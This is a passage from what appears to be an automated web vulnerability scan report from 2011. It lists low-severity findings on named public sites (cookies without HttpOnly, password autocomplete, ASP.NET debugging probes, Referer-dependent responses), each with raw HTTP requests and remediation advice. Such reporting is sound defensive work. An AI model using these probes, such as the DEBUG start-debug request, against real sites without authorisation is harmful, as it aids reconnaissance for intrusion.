Set-Cookie: ARCH_HOST=nl.newsbank.com; path=/; domain=.newsbank.com;
Connection: close
Content-Type: text/html
Content-Length: 1910

<html><head>
<title>NewsLibrary Error</title>
</head>
<body>
<map name="FPMap0">
<area href="/nlsite/faq.htm" shape="rect" coords="386, 20, 429, 37">
<area href="/nlsite/about.htm" shape="rect" coor
...[SNIP]...

14.157. http://www.sacbee.com/reg_js/access_check.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/reg_js/access_check.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vmix_core_user_info=.null; domain=.sacbee.com; path=/vmix_hosted_apps; expires=Thu, 09-Sep-2010 01:27:14 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg_js/access_check.js HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.158. http://www.wtp101.com/pull_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/pull_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Tue, 03 Sep 2013 01:15:38 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.159. http://www.youtube.com/results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/results

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GEO=9fbf89003429ef13c94fa32a778173c7cwsAAAAzVVMyF3tqTmLURA==; path=/; domain=.youtube.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15. Password field with autocomplete enabled previous next
There are 17 instances of this issue:

http://digg.com/submit
https://login.yahoo.com/config/login
http://slashdot.org/bookmark.pl
http://slashdot.org/bookmark.pl
http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html
http://www.ispsports.com/radio-network-affiliates.cfm
https://www.linkedin.com/secure/login
http://www.outbrain.com/privacy
http://www.sacbee.com/reg-bin/int.cgi
http://www.sacbee.com/reg-bin/int.cgi
https://www.sprint.net/
https://www.sprint.net/
https://www.sprint.net/index.php
https://www.sprint.net/index.php
http://www.thatsracin.com/reg-bin/int.cgi
http://www.thatsracin.com/reg-bin/int.cgi
http://www.thatsracin.com/reg-bin/int.cgi

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

15.1. http://digg.com/submit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL:

http://digg.com/submit

The form contains the following password field with autocomplete enabled:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.2. https://login.yahoo.com/config/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.yahoo.com
Path:	/config/login

Issue detail

The page contains a form with the following action URL:

https://login.yahoo.com/config/login?

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /config/login HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 49854

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</legend>

<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="" name="login_form" id="login_form" onsubmit="return hash2(this)">

<input type="hidden" name=".tries" value="1">
...[SNIP]...
</label>
<input name='passwd' id='passwd' type='password' maxlength='64' tabindex='2'>

</div>
...[SNIP]...

15.3. http://slashdot.org/bookmark.pl previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://slashdot.org
Path:	/bookmark.pl

Issue detail

The page contains a form with the following action URL:

https://slashdot.org/my/login

The form contains the following password field with autocomplete enabled:

upasswd

Request

GET /bookmark.pl HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.00500120110825.03
X-Bender: You can trust anything!
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 15218
Date: Sun, 04 Sep 2011 01:24:04 GMT
X-Varnish: 19386691
Age: 0
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>

<meta name="viewport" content="width=device-width, user-scalable=yes, initial-scale=1.0, maximum-scale=10.0" />
<meta name="apple-mobile-web-app-capab
...[SNIP]...
<div id='embbeded_login_modal' class="hide">
<form action="https://slashdot.org/my/login" method="post" onsubmit="if (global_returnto) { this.returnto.value = global_returnto }" class="embedded"><fieldset>
...[SNIP]...
</label>
<input type="password" name="upasswd" placeholder="6-20 characters long">
</p>
...[SNIP]...

15.4. http://slashdot.org/bookmark.pl previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://slashdot.org
Path:	/bookmark.pl

Issue detail

The page contains a form with the following action URL:

https://slashdot.org/my/login

The form contains the following password field with autocomplete enabled:

upasswd

Request

GET /bookmark.pl HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.5. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.foxsportssouthwest.com
Path:	/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Issue detail

The page contains a form with the following action URL:

http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

The form contains the following password field with autocomplete enabled:

login_password

Request

Response

15.6. http://www.ispsports.com/radio-network-affiliates.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ispsports.com
Path:	/radio-network-affiliates.cfm

Issue detail

The page contains a form with the following action URL:

http://www.ispsports.com/affiliate-employee-login.cfm

The form contains the following password field with autocomplete enabled:

password

Request

GET /radio-network-affiliates.cfm HTTP/1.1
Host: www.ispsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.7. https://www.linkedin.com/secure/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The page contains a form with the following action URL:

https://www.linkedin.com/secure/login

The form contains the following password field with autocomplete enabled:

session_password

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.8. http://www.outbrain.com/privacy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.outbrain.com
Path:	/privacy

Issue detail

The page contains a form with the following action URL:

https://www.outbrain.com/login

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /privacy HTTP/1.1
Host: www.outbrain.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:24 GMT
Server: Apache
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 15463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lan
...[SNIP]...
</p>
<form id="dash-signin" action="https://www.outbrain.com/login" method="post">

<input type="hidden" name="submitted" value="true"/>
...[SNIP]...
</label> <input type="password" id="signin-pass" name="loginPassword" />
</div>
...[SNIP]...

15.9. http://www.sacbee.com/reg-bin/int.cgi previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL:

http://www.sacbee.com/reg-bin/int.cgi

The form contains the following password fields with autocomplete enabled:

password
pwconfirm

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.10. http://www.sacbee.com/reg-bin/int.cgi previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL:

http://www.sacbee.com/reg-bin/int.cgi

The form contains the following password field with autocomplete enabled:

password

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
gs: new
...[SNIP]...
</h3>
<form id="LoginForm" name="LoginForm" action="/reg-bin/int.cgi" method="post">
<input type="hidden" name="mode" value="login_done" />
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" size="25" class="miregtext">
<input type="image" id="signin-button" src="/static/images/signin-button.png" value="Sign In" />
...[SNIP]...

15.11. https://www.sprint.net/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.sprint.net/login

The form contains the following password field with autocomplete enabled:

pass

Request

GET / HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:01:50 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 16842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<div style="margin-top: 0; border-top: 1px solid #C1C1C1; padding: 5px 0px 0px 15px;">
<form style="margin-top: 2px;" method="post" action="/login" enctype="application/x-www-form-urlencoded" name="login">
<input type="hidden" name="z" value="" />
...[SNIP]...
</p>
<input name="pass" type="password" size="20" />
<input style="margin-top: 10px;" name="signin" type="image" value="login" src="/images/signin.jpg" alt="sign in" />
...[SNIP]...

15.12. https://www.sprint.net/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.sprint.net/login

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:01:50 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 16842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<div id="login_form" class="ui-corner-all">
                       <form style="margin-top: 2px;" method="post" action="/login" enctype="application/x-www-form-urlencoded" name="login">
                   <input name="z" value="" type="hidden">
...[SNIP]...
</p>
               <input name="pass" size="20" type="password">

                   <div>
...[SNIP]...

15.13. https://www.sprint.net/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/index.php

Issue detail

The page contains a form with the following action URL:

https://www.sprint.net/login

The form contains the following password field with autocomplete enabled:

pass

Request

GET /index.php HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:27:57 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 16851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<div id="login_form" class="ui-corner-all">
                       <form style="margin-top: 2px;" method="post" action="/login" enctype="application/x-www-form-urlencoded" name="login">
                   <input name="z" value="" type="hidden">
...[SNIP]...
</p>
               <input name="pass" size="20" type="password">

                   <div>
...[SNIP]...

15.14. https://www.sprint.net/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/index.php

Issue detail

The page contains a form with the following action URL:

https://www.sprint.net/login

The form contains the following password field with autocomplete enabled:

pass

Request

GET /index.php HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:27:57 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 16851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<div style="margin-top: 0; border-top: 1px solid #C1C1C1; padding: 5px 0px 0px 15px;">
<form style="margin-top: 2px;" method="post" action="/login" enctype="application/x-www-form-urlencoded" name="login">
<input type="hidden" name="z" value="" />
...[SNIP]...
</p>
<input name="pass" type="password" size="20" />
<input style="margin-top: 10px;" name="signin" type="image" value="login" src="/images/signin.jpg" alt="sign in" />
...[SNIP]...

15.15. http://www.thatsracin.com/reg-bin/int.cgi previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.thatsracin.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL:

http://www.thatsracin.com/reg-bin/int.cgi

The form contains the following password field with autocomplete enabled:

password

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.16. http://www.thatsracin.com/reg-bin/int.cgi previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.thatsracin.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL:

http://www.thatsracin.com/reg-bin/int.cgi

The form contains the following password field with autocomplete enabled:

password

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="
...[SNIP]...
<div class="login-form">
<form method="post" action="/reg-bin/int.cgi">
<input type="hidden" value="login_done" name="mode"/>
...[SNIP]...
</label>
<input type="password" class="text" name="password" />

...[SNIP]...

15.17. http://www.thatsracin.com/reg-bin/int.cgi previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.thatsracin.com
Path:	/reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL:

http://www.thatsracin.com/reg-bin/int.cgi

The form contains the following password fields with autocomplete enabled:

password
pwconfirm

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="
...[SNIP]...
</script>

<form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()" id="registration">
<input type="hidden" name="mode" value="register_done">
...[SNIP]...
</label>
<input type="password" name="password" class="miregpassword" id="miregpasswordpassword" value="">
</div>
...[SNIP]...
</label>
<input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwconfirm" value="">
</div>
...[SNIP]...

16. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://platform.linkedin.com
Path:	/js/nonSecureAnonymousFramework

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /js/nonSecureAnonymousFramework?v=0.0.1132-RC5.9322-1337 HTTP/1.1
Host: platform.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 00:45:49 GMT
Expires: Sun, 11 Sep 2011 00:45:49 GMT
Last-Modified: Sat, 03 Sep 2011 04:25:33 GMT
Server: ECS (sjo/5235)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 144326

(function(){
var l,
doAuth,
h = [],
valid = false,
a = "",
fwk = "http://platform.linkedin.com/js/framework?v=0.0.1132-RC5.9322-1337",
xtnreg = /extensions=([^&]*)&?/,
xtn
...[SNIP]...
<?js ?>";
l=l.split(" ");
var p=l[0]||"<?js",o=l[1]||"?>";
if(!p||!o){throw new Error("Template markers must be set.")
}if(p==o){throw new Error("Start and end markers cannot be identical.")
}p=new RegExp(b(p),"g");
o=new RegExp(b(o),"g");
var n=["","var p=
...[SNIP]...

17. ASP.NET debugging enabled previous next
There are 4 instances of this issue:

http://my.textcaster.com/Default.aspx
http://stockscreener.us.reuters.com/Default.aspx
http://usata1.gcion.com/Default.aspx
http://www.wisdomtree.com/Default.aspx

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

17.1. http://my.textcaster.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.textcaster.com
Path:	/Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: my.textcaster.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 04 Sep 2011 01:24:29 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

17.2. http://stockscreener.us.reuters.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://stockscreener.us.reuters.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: stockscreener.us.reuters.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Cache-Control: private
Connection: close
Date: Sun, 04 Sep 2011 01:24:20 GMT
Content-Length: 39
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727

Debug access denied to '/Default.aspx'.

17.3. http://usata1.gcion.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://usata1.gcion.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: usata1.gcion.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Date: Sun, 04 Sep 2011 00:42:44 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="usata1.gcion.com"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

17.4. http://www.wisdomtree.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wisdomtree.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.wisdomtree.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 04 Sep 2011 01:29:25 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18. Referer-dependent response previous next
There are 4 instances of this issue:

http://c.brightcove.com/services/viewer/federated_f9
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/recommendations.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

18.1. http://c.brightcove.com/services/viewer/federated_f9 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://c.brightcove.com
Path:	/services/viewer/federated_f9

Request 1

GET /services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID= HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/players/charlotteobservergeneric.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Sat, 27 Aug 2011 13:30:12 EDT
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110826.2108/BrightcoveBootloader.swf?playerID=1055201224001&purl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&allowScriptAccess=always&autoStart=false&bgcolor=%23F4F4F4&debuggerID=&dynamicStreaming=true&flashID=myExperience&height=500&isUI=true&isVid=true&publisherID=315980433&videoSmoothing=true&width=300&wmode=opaque
Content-Length: 0
Date: Sun, 04 Sep 2011 01:06:08 GMT
Server:

Request 2

GET /services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID= HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Sat, 27 Aug 2011 17:30:12 UTC
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110826.2108/BrightcoveBootloader.swf?playerID=1055201224001&allowScriptAccess=always&autoStart=false&bgcolor=%23F4F4F4&debuggerID=&dynamicStreaming=true&flashID=myExperience&height=500&isUI=true&isVid=true&publisherID=315980433&videoSmoothing=true&width=300&wmode=opaque
Content-Length: 0
Date: Sun, 04 Sep 2011 01:06:49 GMT
Server:

